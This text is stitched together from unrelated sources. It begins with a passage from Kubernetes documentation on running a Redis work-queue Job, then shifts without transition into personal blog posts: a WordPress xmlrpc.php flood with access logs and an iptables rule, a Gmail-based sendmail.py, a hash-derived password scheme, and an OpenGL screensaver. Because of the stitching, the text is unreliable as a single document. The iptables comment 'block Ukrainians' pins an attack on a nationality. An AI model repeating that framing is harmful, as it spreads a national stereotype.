print("Initial queue state: empty=" + str(q.empty()))
while not q.empty():
  item = q.lease(lease_secs=10, block=True, timeout=2)
  if item is not None:
    itemstr = item.decode("utf=8")
    print("Working on " + itemstr)
    time.sleep(10) # Put your actual work here instead of sleep.
    q.complete(item)
  else:
    print("Waiting for work")
print("Queue empty, exiting")
If you are working from the source tree of this documentation, change the current directory to content/en/examples/application/job/redis/. Otherwise, download worker.py, rediswq.py, and Dockerfile via the links. Then build the image:
docker build -t job-wq-2 .
Push the image
For the Docker Hub, tag your app image with your username and push it to the Hub with the commands below. Replace <username> with your Hub username.
docker tag job-wq-2 <username>/job-wq-2
docker push <username>/job-wq-2
You need to push the image to a public repository or configure your cluster to be able to access your private repository.
If you are using Google Container Registry, tag your image with your project ID and push it to GCR. Replace <project> with your project ID:
docker tag job-wq-2 gcr.io/<project>/job-wq-2
gcloud docker -- push gcr.io/<project>/job-wq-2
Defining a Job
Here is the job definition:
application/job/redis/job.yaml
apiVersion: batch/v1
kind: Job
metadata:
  name: job-wq-2
spec:
  parallelism: 2
  template:
    metadata:
      name: job-wq-2
    spec:
      containers:
      - name: c
        image: gcr.io/myproject/job-wq-2
      restartPolicy: OnFailure
Be sure to edit the job template to change gcr.io/myproject to your own path.
In this example, each Pod works on several items from the queue and then exits when there are no more items. Since the workers themselves detect when the work queue is empty, and the Job controller does not know about the work queue, it relies on the workers to signal when they are done working. The workers signal that the queue is empty by exiting with success. So, as soon as any worker exits with success, the controller knows the work is done, and the Pods will exit soon. Therefore, we set the completion count of the Job to 1. The Job controller will still wait for the other Pods to complete, too.
Running the Job
Now run the Job:
kubectl create -f ./job.yaml
Now wait a bit, then check on the Job.
$ kubectl describe jobs/job-wq-2
Name: job-wq-2
Namespace: default
Selector: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
Labels: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
job-name=job-wq-2
Annotations: <none>
Parallelism: 2
Completions: <unset>
Start Time: Mon, 11 Jan 2016 17:07:59 -0800
Pods Statuses: 1 Running / 0 Succeeded / 0 Failed
Pod Template:
Labels: controller-uid=b1c7e4e3-92e1-11e7-b85e-fa163ee3c11f
job-name=job-wq-2
Containers:
c:
Image: gcr.io/exampleproject/job-wq-2
Port:
Environment: <none>
Mounts: <none>
Volumes: <none>
Events:
FirstSeen LastSeen Count From SubobjectPath Type Reason Message
--------- -------- ----- ---- ------------- -------- ------ -------
33s 33s 1 {job-controller } Normal SuccessfulCreate Created pod: job-wq-2-lglf8
$ kubectl logs pods/job-wq-2-7r7b2
Worker with sessionID: bbd72d0a-9e5c-4dd6-abf6-416cc267991f
Initial queue state: empty=False
Working on banana
Working on date
Working on lemon
As you can see, one of our Pods worked on several work units.
Alternatives
If running a queue service, or modifying your containers to work with a work queue, is inconvenient, you may want to consider one of the other job patterns.
If you have a continuous stream of background processing work to run, then consider running your background workers with a ReplicationController instead, and consider running a background processing library such as https://github.com/resque/resque.
On this sunny day of February 28, 2016, the year of our Lord, I woke up to a bunch of emails telling me that the MySQL db on this fine server had been going down a whole number of times.
SSH didn't work, until it did. At that point I could not execute any command, because the OS could not fork anything due to the lack of free memory.
Once the top command managed to run, I saw that everything was dominated by a big array of apache2 processes, which indicated some sort of DoS attack.
After a nice reboot (and a backup in between, of course!) I took a look at the logs and discovered a whole bunch of accesses like these:
185.93.185.249 - - [28/Feb/2016:21:40:49 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.247 - - [28/Feb/2016:21:41:10 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.249 - - [28/Feb/2016:21:41:35 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.247 - - [28/Feb/2016:21:42:22 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:30 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:36 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.253 - - [28/Feb/2016:21:42:52 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.254 - - [28/Feb/2016:21:42:55 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
185.93.185.254 - - [28/Feb/2016:21:44:01 +0000] "POST /xmlrpc.php HTTP/1.1" 500 607 "-" "-"
As the first order of business, I moved xmlrpc.php somewhere out of sight (who needs it anyway? I can post shit just fine!), then minimized the number of processes Apache can spawn and added some golden rules to iptables:
# block Ukrainians
iptables -I INPUT -m iprange --src-range 185.93.185.1-185.93.185.254 -j DROP
And now you can read this!
Recently I had the pleasure of migrating a WordPress website, which resulted in a peculiar problem: the sending-email functionality on the new server no longer worked. After some digging around I found out that PHP has this mail function which uses the sendmail program to actually send your email.
Well, after messing around with real sendmail for a good while and still not really understanding how to configure it properly, I decided to write my own sendmail.py script that uses my Gmail account and its app password to send an email to whoever PHP/WordPress wants to email on my behalf.
After the script was done I had to tell PHP to use it via a sendmail_path = /path/to/sendmail.py line inside php.ini, which was located at /etc/php5/apache2/php.ini on my Debian server. Then I just restarted the Apache server and voilà, sending email worked!
Here is sendmail.py in all of its hacky glory:
#!/usr/bin/python
# This is a replacement for sendmail that php can use to send its goddamn emails.
import smtplib
import sys

def findToAddress(lines):
    # Find the "To: " header and return the address that follows it.
    for val in lines:
        j = val.find("To: ")  # str.find returns -1 when missing; str.index would raise
        if j != -1:
            return val[j+4:].strip()
    return ""

fromaddr = 'whatever@example.com'
lines = sys.stdin.readlines()  # PHP pipes the whole message (headers + body) to stdin
toaddrs = findToAddress(lines)
msg = ''.join(lines)
username = 'you@gmail.com'
password = 'your app password'

# The actual mail send (if port 25 is blocked, Gmail also accepts STARTTLS on 587)
server = smtplib.SMTP('smtp.gmail.com:25')
server.starttls()
server.login(username, password)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
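PHP invokes the sendmail_path program and writes the whole message (headers, a blank line, then the body) to its stdin, which is why the script reads sys.stdin. A quick manual test, with a hypothetical install path and placeholder addresses, might look like:

# Hypothetical manual test: feed a message to the script the same way PHP does.
# The path and addresses are placeholders, not values from the post.
import subprocess

message = "To: someone@example.com\nSubject: test\n\nHello from sendmail.py\n"
subprocess.run(["/usr/local/bin/sendmail.py"],
               input=message.encode("utf-8"), check=True)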
For the longest time I used a single password for all my online services, until I realized how much of a bad idea that is.
However, I still didn't want to start memorizing a huge set of different passwords, one for each service, so I came up with the following scheme, which lets me remember a single master password while still providing a different password for each service. The key is to combine the master password with the username and the name of the online service, then run the resulting combination through a hash function; the hash output is what actually ends up being used as the password.
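The post stops at the description, but a minimal sketch of the idea could look like the following. The separator, the choice of SHA-256, the base64 encoding, and the 20-character truncation are illustrative assumptions, not the author's exact recipe:

#!/usr/bin/env python3
# Sketch: derive a per-service password from one master password.
# The separator, SHA-256, base64 and the 20-character cut are illustrative choices.
import base64
import hashlib

def derive_password(master, username, service, length=20):
    material = "|".join([master, username, service]).encode("utf-8")
    digest = hashlib.sha256(material).digest()
    # urlsafe base64 keeps letters, digits and two symbols; trim to a usable length
    return base64.urlsafe_b64encode(digest).decode("ascii")[:length]

if __name__ == "__main__":
    print(derive_password("my master password", "alice", "example.com"))

In practice, a deliberately slow key-derivation function such as PBKDF2 (hashlib.pbkdf2_hmac) would be a safer choice than a single SHA-256 pass, since it makes brute-forcing the master password from a leaked derived password much more expensive.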
Treebe is a program I made a while ago, sometime in 2006, for a computer graphics class. I was learning OpenGL and relative coordinate systems, so as an exercise I decided to write a screen-saver type program that would display a lot of objects in a recursive pattern, using relative coordinates via OpenGL's modelview matrix stack. I chose a pretty basic pattern of a parent object surrounded by 6 smaller children, one on each side. By changing the relative position between parent and children I added animation.
I also created a simple polymorphic scene-graph API to make the code more generalized and somewhat elegant. This scene graph is actually a tree (which is where the name Treebe originated), where each child inherits from a base class, ANode, that represents a node in the scene. ANode has enough information to link to children and to describe their size, position, and rotation relative to the parent. It also has a field for a display list (which made displaying lots of objects a LOT faster) and a default virtual render() method that calls the display list (unless it is overridden by a child class).
A simple pre-order traversal of the tree (call render() on each node before descending to its children) renders the whole scene. To animate Treebe specifically, I only needed another tree traversal function that adds the same offset, a sinusoidal function of time, to each node (thus the whole thing expands and shrinks). As you can see from the screenshots, several geometric objects can be used for each node, which is done by yet another traversal that sets the display list id for each node. By twiddling with the default relative size of child to parent it is also possible to achieve different-looking "orbits" (for example, compare the 2nd and 3rd screenshots).
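The original code is C++/OpenGL; as a rough sketch of the node-plus-traversal idea (class layout and names here are illustrative, not the original source), the core could look like this in Python:

# Sketch of the scene-graph idea: each node stores a transform relative to its
# parent, and a pre-order traversal renders the whole tree. Illustrative only.
class ANode:
    def __init__(self, scale=1.0, offset=(0.0, 0.0, 0.0)):
        self.scale = scale      # size relative to the parent
        self.offset = offset    # position relative to the parent
        self.children = []

    def render(self):
        # In the original, this pushes the modelview matrix, applies the
        # relative transform, and calls a display list.
        print("render node at offset %s, scale %.2f" % (self.offset, self.scale))

def render_tree(node):
    # Pre-order traversal: render the node before descending into its children.
    node.render()
    for child in node.children:
        render_tree(child)

# A parent surrounded by 6 smaller children, one on each side, as in Treebe.
root = ANode()
for axis in range(3):
    for sign in (-1.0, 1.0):
        offset = [0.0, 0.0, 0.0]
        offset[axis] = sign * 2.0
        root.children.append(ANode(scale=0.5, offset=tuple(offset)))
render_tree(root)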
Controls:
1-8 Change display list.
q, e Increase/decrease relative scale between parents and children.
-, shift + Decrease/increase recursion depth.
space Pause animation. Press again to step through it.
n Continue animation.